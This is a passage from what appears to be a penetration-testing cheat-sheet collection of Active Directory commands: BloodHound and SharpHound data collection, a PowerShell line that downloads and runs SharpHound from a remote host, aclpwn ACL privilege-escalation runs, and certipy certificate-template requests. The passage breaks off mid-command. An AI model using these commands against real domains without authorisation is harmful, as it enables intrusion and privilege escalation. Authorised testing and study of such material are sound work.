## bloodhound - collect data
#plateform/linux #target/remote #port/389 #port/631 #cat/RECON
https://github.com/fox-it/BloodHound.py

```bash
bloodhound-python -d -u -p -c all
```

## bloodhound - collect data (alternative)
#plateform/linux #target/remote #port/389 #port/631 #cat/RECON
https://github.com/fox-it/BloodHound.py

```bash
bloodhound-python -d -u -p -gc -dc -c all
```

## sharphound - collect bloodhound data
#plateform/windows #target/remote #port/389 #port/631 #cat/RECON
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

```powershell
import-module sharphound.ps1
invoke-bloodhound -collectionmethod all -domain
```

## sharphound - collect bloodhound data, download and execute
#plateform/windows #target/remote #port/389 #port/631 #cat/RECON
https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors

```powershell
(new-object system.net.webclient).downloadstring('http:///SharpHound.ps1') | Invoke-BloodHound -CollectionMethod All -domain
```

## cypheroth - start
#plateform/linux #target/local #cat/RECON
Toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets.
57 | 58 | https://github.com/seajaysec/cypheroth 59 | 60 | ```bash 61 | cypheroth -u -p -d 62 | ``` 63 | 64 | ## aclpwn - from computer to domain - dry run 65 | #plateform/linux #target/local #cat/RECON 66 | Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. 67 | 68 | https://github.com/fox-it/aclpwn.py 69 | 70 | ``` 71 | aclpwn -f -ft computer -d -dry 72 | ``` 73 | 74 | 75 | 76 | -------------------------------------------------------------------------------- /arsenal/data/cheats/Active_directory/certipy.md: -------------------------------------------------------------------------------- 1 | # certipy 2 | 3 | % adcs, certificate, pki, windows, Active directory, template, shadow credential 4 | 5 | ## certipy - list certificate templates 6 | #plateform/linux #target/remote #cat/RECON 7 | ``` 8 | certipy find -u @ -p '' -dc-ip 9 | ``` 10 | 11 | ## certipy - request certificate 12 | #plateform/linux #target/remote #cat/ATTACK 13 | ``` 14 | certipy req -u @ -p '' -target -template